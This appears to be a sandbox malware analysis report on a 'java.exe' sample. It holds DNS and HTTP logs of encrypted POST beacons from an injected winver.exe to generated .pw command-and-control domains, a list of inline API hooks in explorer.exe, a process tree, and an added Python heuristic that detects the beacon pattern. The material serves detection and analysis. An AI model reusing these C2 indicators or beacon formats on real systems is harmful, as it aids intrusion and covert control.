Dec 19, 2023 00:41:46.525633097 CET | 58068 | 53 | 192.168.2.4 | 1.1.1.1
Dec 19, 2023 00:41:47.101788998 CET | 53 | 58068 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2023 00:41:10.802402020 CET | 192.168.2.4 | 1.1.1.1 | 0x9459 | Standard query (0) | spaines.pw | A (IP address) | IN (0x0001) | false
Dec 19, 2023 00:41:38.617091894 CET | 192.168.2.4 | 1.1.1.1 | 0xc3ae | Standard query (0) | uyhgqunqkxnx.pw | A (IP address) | IN (0x0001) | false
Dec 19, 2023 00:41:44.969724894 CET | 192.168.2.4 | 1.1.1.1 | 0x2e03 | Standard query (0) | vcklmnnejwxx.pw | A (IP address) | IN (0x0001) | false
Dec 19, 2023 00:41:46.525633097 CET | 192.168.2.4 | 1.1.1.1 | 0xe6b7 | Standard query (0) | cmnsgscccrej.pw | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2023 00:41:11.373840094 CET | 1.1.1.1 | 192.168.2.4 | 0x9459 | No error (0) | spaines.pw | - | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Dec 19, 2023 00:41:39.146748066 CET | 1.1.1.1 | 192.168.2.4 | 0xc3ae | No error (0) | uyhgqunqkxnx.pw | - | 104.131.68.180 | A (IP address) | IN (0x0001) | false
Dec 19, 2023 00:41:39.146748066 CET | 1.1.1.1 | 192.168.2.4 | 0xc3ae | No error (0) | uyhgqunqkxnx.pw | - | 45.77.249.79 | A (IP address) | IN (0x0001) | false
Dec 19, 2023 00:41:39.146748066 CET | 1.1.1.1 | 192.168.2.4 | 0xc3ae | No error (0) | uyhgqunqkxnx.pw | - | 178.62.201.34 | A (IP address) | IN (0x0001) | false
Dec 19, 2023 00:41:45.555104971 CET | 1.1.1.1 | 192.168.2.4 | 0x2e03 | No error (0) | vcklmnnejwxx.pw | - | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Dec 19, 2023 00:41:47.101788998 CET | 1.1.1.1 | 192.168.2.4 | 0xe6b7 | No error (0) | cmnsgscccrej.pw | - | 216.218.185.162 | A (IP address) | IN (0x0001) | false
• https:
  • www.bing.com
• spaines.pw
• uyhgqunqkxnx.pw
• vcklmnnejwxx.pw
• cmnsgscccrej.pw
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 216.218.185.162 | 80 | 6384 | C:\Windows\SysWOW64\winver.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2023 00:41:33.880542994 CET | 93 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
Host: spaines.pw
Content-Length: 157
Data Raw: 17 df be d8 01 d5 be d8 79 91 65 5a 11 dd bf fb 27 ef 8e e8 27 ef 8e e8
Data Ascii: yeZ''
Dec 19, 2023 00:41:34.082025051 CET | 133 | OUT | Data Raw: 00 80 00 00 00 77 ee f1 1d 7b 26 be ec 1a 51 ba f1 d2 a4 d3 f7 e9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 81 ae 9b 1e d7 58 12 93 3e 77 77 7a 3e 5e 7c 99 17 7c 25 a4 ee b2 87 0f bd d3 27 4d f0 4b 6a bb 2d cc 2c a2 7c bd b4 b1 79 e8 c4 ab 1b
Data Ascii: w{&QYg6u#aX>wwz>^||%'MKj-,|yVB}{)g4fo=hjD9xTq}U
Dec 19, 2023 00:41:34.283396959 CET | 156 | IN | HTTP/1.1 200 OK
Server: nginx/1.21.6
Date: Mon, 18 Dec 2023 23:41:34 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49736 | 104.131.68.180 | 80 | 6384 | C:\Windows\SysWOW64\winver.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2023 00:41:44.628602982 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
Host: uyhgqunqkxnx.pw
Content-Length: 157
Data Raw: df a3 ff f3 c4 a9 ff f3 b1 ed 24 71 d9 a1 fe d0 ef 93 cf c3 ef 93 cf c3
Data Ascii: $q
Dec 19, 2023 00:41:44.795100927 CET | 133 | OUT | Data Raw: 00 80 00 00 00 71 e7 f8 13 64 36 a3 b3 01 5e d4 89 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c ab 0f 10 a5 5e f7 48 66 e0 38 ff 29 d4 34 f7 00 b5 6d d4 70 17 e0 8f 1c 9e 5c 26 5a 00 b5 8a c4 07 42 79 f5 69 4d 2d 1a af eb d0 03 bf
Data Ascii: qd6^Yg6u#a^Hf8)4mp\&ZByiM-,%^'UVRwMeDc3SE'E=5;*vM]
Dec 19, 2023 00:41:44.968421936 CET | 75 | IN | HTTP/1.0 200 OK
Date: Mon, 18 Dec 2023 23:41:44 GMT
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49737 | 216.218.185.162 | 80 | 6384 | C:\Windows\SysWOW64\winver.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2023 00:41:46.120626926 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
Host: vcklmnnejwxx.pw
Content-Length: 157
Data Raw: 44 9d 81 a8 58 97 81 a8 2a d3 5a 2a 42 9f 80 8b 74 ad b1 98 74 ad b1 98
Data Ascii: DX*Z*Btt
Dec 19, 2023 00:41:46.322359085 CET | 133 | OUT | Data Raw: 00 80 00 00 00 72 fd fb 18 78 2d a3 a7 00 51 c2 89 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c ce 3a cf 56 b7 df cf c4 81 1e 9f b8 bc c8 39 5e 41 f6 86 66 89 07 a1 d0 90 0f d4 8e 21 23 51 7c f5 01 fd 6f 8b 2e d4 7c c2 45 1b 69 8a
Data Ascii: rx-QYg6u#a:V9^Af!#Q|o.|Eik,09^Yj"c(<<0?z6Y`*3
Dec 19, 2023 00:41:46.524444103 CET | 156 | IN | HTTP/1.1 200 OK
Server: nginx/1.21.6
Date: Mon, 18 Dec 2023 23:41:46 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49738 | 216.218.185.162 | 80 | 6384 | C:\Windows\SysWOW64\winver.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2023 00:41:47.666889906 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
Host: cmnsgscccrej.pw
Content-Length: 157
Data Raw: 38 28 9d 64 25 22 9d 64 56 66 46 e6 3e 2a 9c 47 08 18 ad 54 08 18 ad 54
Data Ascii: 8(d%"dVfF>*GTT
Dec 19, 2023 00:41:47.867964983 CET | 133 | OUT | Data Raw: 00 80 00 00 00 67 f3 fe 07 72 30 ae a1 09 54 df 9b fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c d7 66 d3 12 68 bf 2b 87 28 f7 bb f4 88 8c 42 12 a7 7b aa 22 89 aa bc 94 a8 3b 30 d2 df a8 75 20 4d ea 86 2b 61 c1 f8 38 cf b8 06 25 65
Data Ascii: gr0TYg6u#afh+(B{";0u M+a8%e/&*t2hd{l(8[u]\El|[%W
Dec 19, 2023 00:41:48.071468115 CET | 137 | IN | HTTP/1.1 200 OK
Server: nginx/1.21.6
Date: Mon, 18 Dec 2023 23:41:47 GMT
Content-Type: application/octet-stream
Connection: close
Dec 19, 2023 00:41:48.071528912 CET | 1 | IN | Data Raw: 58
Data Ascii: X
Dec 19, 2023 00:41:53.135473013 CET | 1 | IN | Data Raw: 65
Data Ascii: e
Dec 19, 2023 00:41:59.167958021 CET | 1 | IN | Data Raw: 65
Data Ascii: e
Dec 19, 2023 00:42:05.148691893 CET | 1 | IN | Data Raw: 55
Data Ascii: U
Dec 19, 2023 00:42:11.177659988 CET | 1 | IN | Data Raw: 46
Data Ascii: F
Dec 19, 2023 00:42:17.132055044 CET | 1 | IN | Data Raw: 71
Data Ascii: q
Dec 19, 2023 00:42:23.131304979 CET | 1 | IN | Data Raw: 54
Data Ascii: T
Dec 19, 2023 00:42:29.123557091 CET | 1 | IN | Data Raw: 55
Data Ascii: U
Dec 19, 2023 00:42:35.163013935 CET | 1 | IN | Data Raw: 6f
Data Ascii: o

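The four winver.exe sessions above share one request shape: a POST to /EiDQjNbWEQ/ over HTTP/1.0, only a Host and a Content-Length: 157 header, no User-Agent (the report's own "HTTP GET or POST without a user agent" signature), and, for three of the four, a Host that is a bare run of twelve lowercase letters under .pw. The byte counts also line up: the 24 body bytes shown in the first frame plus the 133-byte second frame equal the declared 157. The following detector is an added example and is not part of the Joe Sandbox report or of any Snort rule; the request texts are reconstructed from the session tables above (bodies omitted), the www.bing.com control request is constructed, and the indicator names, the 10-16 letter DGA length window and the three-indicator threshold are this example's assumptions.

```python
"""Heuristic detector for the winver.exe beacon pattern captured above.

Added example, not part of the Joe Sandbox report. Request heads are
reconstructed from the report's session tables; thresholds and names are
this example's assumptions.
"""
import re
from dataclasses import dataclass, field

# Constructed from the sessions above: request line and headers as captured,
# bodies omitted (only the declared Content-Length is used here).
CAPTURED_REQUESTS = [
    ("216.218.185.162", "POST /EiDQjNbWEQ/ HTTP/1.0\r\nHost: spaines.pw\r\nContent-Length: 157\r\n\r\n"),
    ("104.131.68.180", "POST /EiDQjNbWEQ/ HTTP/1.0\r\nHost: uyhgqunqkxnx.pw\r\nContent-Length: 157\r\n\r\n"),
    ("216.218.185.162", "POST /EiDQjNbWEQ/ HTTP/1.0\r\nHost: vcklmnnejwxx.pw\r\nContent-Length: 157\r\n\r\n"),
    ("216.218.185.162", "POST /EiDQjNbWEQ/ HTTP/1.0\r\nHost: cmnsgscccrej.pw\r\nContent-Length: 157\r\n\r\n"),
    # Constructed benign control modelled on the SearchApp.exe session: a
    # browser-style HTTP/1.1 POST that carries a User-Agent.
    ("173.222.162.32", "POST /threshold/xls.aspx HTTP/1.1\r\nHost: www.bing.com\r\n"
                       "User-Agent: Mozilla/5.0\r\nContent-Type: text/xml\r\nContent-Length: 2232\r\n\r\n"),
]


@dataclass
class HttpRequest:
    method: str
    path: str
    version: str
    headers: dict = field(default_factory=dict)  # header names lower-cased


def parse_request_head(raw: str) -> HttpRequest:
    """Parse the request line and headers of one captured HTTP request."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, version, headers)


# Assumption: a single label of 10-16 lowercase letters directly under .pw,
# matching the three generated-looking names in the DNS tables above.
_DGA_HOST = re.compile(r"^[a-z]{10,16}\.pw$")


def looks_like_dga(host: str) -> bool:
    """True for hostnames shaped like uyhgqunqkxnx.pw; spaines.pw is too short."""
    return bool(_DGA_HOST.match(host))


def beacon_indicators(req: HttpRequest) -> list[str]:
    """Return the names of every indicator the request matches (empty if none)."""
    hits = []
    if req.method == "POST" and req.version == "HTTP/1.0":
        hits.append("post-http10")
    if "user-agent" not in req.headers:
        hits.append("no-user-agent")
    if req.headers.get("content-length") == "157":
        hits.append("content-length-157")
    if looks_like_dga(req.headers.get("host", "")):
        hits.append("dga-host")
    return hits


def is_c2_beacon(req: HttpRequest, min_hits: int = 3) -> bool:
    """Assumed threshold: three or more indicators on one request."""
    return len(beacon_indicators(req)) >= min_hits


def scan(captured=CAPTURED_REQUESTS) -> list[tuple[str, str, list[str]]]:
    """Return (dest_ip, host, indicators) for every request that trips the rule."""
    alerts = []
    for dest_ip, raw in captured:
        req = parse_request_head(raw)
        if is_c2_beacon(req):
            alerts.append((dest_ip, req.headers.get("host", ""), beacon_indicators(req)))
    return alerts


if __name__ == "__main__":
    for dest_ip, host, hits in scan():
        print(f"{host} ({dest_ip}): {', '.join(hits)}")
```

Run stand-alone, the script reports the four winver.exe requests and stays silent on the Bing control. The first-stage domain spaines.pw does not match the DGA shape but still trips the rule on the HTTP/1.0 POST, the missing User-Agent and the fixed 157-byte body, which is why the threshold is set on a count of indicators rather than on the hostname alone.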

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 173.222.162.32 | 443 | 4984 | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
Timestamp | Bytes transferred | Direction | Data
2023-12-18 23:41:25 UTC | 2301 | OUT | POST /threshold/xls.aspx HTTP/1.1
Origin: https://www.bing.com
Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
Accept: */*
Accept-Language: en-CH
Content-type: text/xml
X-Agent-DeviceId: 01000A4109000CC6
X-BM-CBT: 1696420817
X-BM-DateFormat: dd/MM/yyyy
X-BM-DeviceDimensions: 784x984
X-BM-DeviceDimensionsLogical: 784x984
X-BM-DeviceScale: 100
X-BM-DTZ: 60
X-BM-Market: CH
X-BM-Theme: 000000;0078d7
X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
X-Device-ClientSession: 0912CF9094994CFA88DE52C6FB19D4E1
X-Device-isOptin: false
X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
X-Device-OSSKU: 48
X-Device-Touch: false
X-DeviceID: 01000A4109000CC6
X-MSEdge-ExternalExp: bfbwsbrs0830tf,d-thshldspcl40,msbdsborgv2co,msbwdsbi920t1,spofglclicksh-c2,webtophit0r_t,wsbmsaqfuxtc,wsbqfasmsall_t,wsbqfminiserp400,wsbref-t
X-MSEdge-ExternalExpType: JointCoord
X-PositionerType: Desktop
X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
X-Search-CortanaAvailableCapabilities: None
X-Search-SafeSearch: Moderate
X-Search-TimeZone: Bias=0; DaylightBias=-60; TimeZoneKeyName=GMT Standard Time
X-UserAgeClass: Unknown
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: www.bing.com
Content-Length: 2232
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MUID=6666694284484FA1B35CCB433D42E997; _SS=SID=193A581F83766B4319784BBF829B6A16&CPID=1696420820117&AC=1&CPH=e5c79613&CBV=39942242; _EDGE_S=SID=193A581F83766B4319784BBF829B6A16; SRCHUID=V=2&GUID=BA43D82178364AEA9C1EE6C32BE93416&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231003; SRCHHPGUSR=SRCHLANG=en&LUT=1696420817741&IPMH=425591ef&IPMID=1696420817913&HV=1696417346; ANON=A=6D8F9DF00282E660E425530EFFFFFFFF; CortanaAppUID=4C9C2B2D0465FD7A42C74C7E93CFB630; MUIDB=6666694284484FA1B35CCB433D42E997
2023-12-18 23:41:25 UTC | 2232 | OUT | Data Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 36 36 36 36 36 39 34 32 38 34 34 38 34 46 41 31 42 33 35 43 43 42 34 33 33 44 34 32 45 39 39 37 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 38 39 32 46 41 30 37 38 38 36 34 31 34 42 44 46 38 45 45 31 37 36 34 41 35 39 46 46 33 39 43 36 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43
Data Ascii: <ClientInstRequest><CID>6666694284484FA1B35CCB433D42E997</CID><Events><E><T>Event.ClientInst</T><IG>892FA07886414BDF8EE1764A59FF39C6</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"C
2023-12-18 23:41:25 UTC | 476 | IN | HTTP/1.1 204 No Content
Access-Control-Allow-Origin: *
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: 3E58B4D29D4146169BADA8B6E4FA0F6B Ref B: BY3EDGE0305 Ref C: 2023-12-18T23:41:25Z
Date: Mon, 18 Dec 2023 23:41:25 GMT
Connection: close
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.20a6dc17.1702942885.1ccaa844


Code Manipulations

Function Name          Hook Type   Active in Processes
ZwResumeThread         INLINE      explorer.exe
NtQueryDirectoryFile   INLINE      explorer.exe
ZwEnumerateValueKey    INLINE      explorer.exe
NtResumeThread         INLINE      explorer.exe
ZwCreateUserProcess    INLINE      explorer.exe
NtEnumerateValueKey    INLINE      explorer.exe
NtCreateUserProcess    INLINE      explorer.exe
ZwQueryDirectoryFile   INLINE      explorer.exe

Function Name          Hook Type   New Data
ZwResumeThread         INLINE      0xE9 0x9E 0xE1 0x12 0x25 0x51
NtQueryDirectoryFile   INLINE      0xE9 0x98 0x81 0x12 0x29 0x91
ZwEnumerateValueKey    INLINE      0xE9 0x9C 0xC1 0x12 0x2D 0xD1
NtResumeThread         INLINE      0xE9 0x9E 0xE1 0x12 0x25 0x51
ZwCreateUserProcess    INLINE      0xE9 0x93 0x31 0x11 0x17 0x71
NtEnumerateValueKey    INLINE      0xE9 0x9C 0xC1 0x12 0x2D 0xD1
NtCreateUserProcess    INLINE      0xE9 0x93 0x31 0x11 0x17 0x71
ZwQueryDirectoryFile   INLINE      0xE9 0x98 0x81 0x12 0x29 0x91

Target ID: 0
Start time: 00:41:03
Start date: 19/12/2023
Path: C:\Users\user\Desktop\java.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\java.exe
Imagebase: 0x400000
File size: 116'224 bytes
MD5 hash: 0411C0706F66B49AA6BEF1528606EE31
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 00:41:03
Start date: 19/12/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 00:41:03
Start date: 19/12/2023
Path: C:\Windows\SysWOW64\winver.exe
Wow64 process (32bit): true
Commandline: winver
Imagebase: 0xd00000
File size: 57'344 bytes
MD5 hash: B5471B0FB5402FC318C82C994C6BF84D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 3
Start time: 00:41:03
Start date: 19/12/2023
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff72b770000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 00:41:11
Start date: 19/12/2023
Path: C:\Windows\System32\sihost.exe
Wow64 process (32bit): false
Commandline: sihost.exe
Imagebase: 0x7ff796ef0000
File size: 111'616 bytes
MD5 hash: A21E7719D73D0322E2E7D61802CB8F80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 5
Start time: 00:41:11
Start date: 19/12/2023
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
Imagebase: 0x7ff6eef20000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 6
Start time: 00:41:11
Start date: 19/12/2023
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
Imagebase: 0x7ff6eef20000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 7
Start time: 00:41:12
Start date: 19/12/2023
Path: C:\Windows\System32\ctfmon.exe
Wow64 process (32bit): false
Commandline: ctfmon.exe
Imagebase: 0x7ff7e3b00000
File size: 11'264 bytes
MD5 hash: B625C18E177D5BEB5A6F6432CCF46FB3
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 8
Start time: 00:41:12
Start date: 19/12/2023
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
Imagebase: 0x7ff6eef20000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 9
Start time: 00:41:12
Start date: 19/12/2023
Path: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
Imagebase: 0x7ff7da970000
File size: 793'416 bytes
MD5 hash: 5CDDF06A40E89358807A2B9506F064D9
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

                                                                                                                                                                        Target ID:10
                                                                                                                                                                        Start time:00:41:13
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:11
                                                                                                                                                                        Start time:00:41:14
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                        Imagebase:0x7ff6fdaa0000
                                                                                                                                                                        File size:3'671'400 bytes
                                                                                                                                                                        MD5 hash:5E1C9231F1F1DCBA168CA9F3227D9168
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:12
                                                                                                                                                                        Start time:00:41:19
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\E38A1E29\bin.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\E38A1E29\bin.exe"
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:116'224 bytes
                                                                                                                                                                        MD5 hash:CB95EC2B6EF058D45AA18CD146471002
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:13
                                                                                                                                                                        Start time:00:41:19
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:17
                                                                                                                                                                        Start time:00:41:27
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:18
                                                                                                                                                                        Start time:00:41:27
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\smartscreen.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\System32\smartscreen.exe -Embedding
                                                                                                                                                                        Imagebase:0x7ff7d45b0000
                                                                                                                                                                        File size:2'378'752 bytes
                                                                                                                                                                        MD5 hash:02FB7069B8D8426DC72C9D8A495AF55A
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:19
                                                                                                                                                                        Start time:00:41:27
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\E38A1E29\bin.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\E38A1E29\bin.exe"
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:116'224 bytes
                                                                                                                                                                        MD5 hash:CB95EC2B6EF058D45AA18CD146471002
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:20
                                                                                                                                                                        Start time:00:41:28
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:21
                                                                                                                                                                        Start time:00:41:29
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
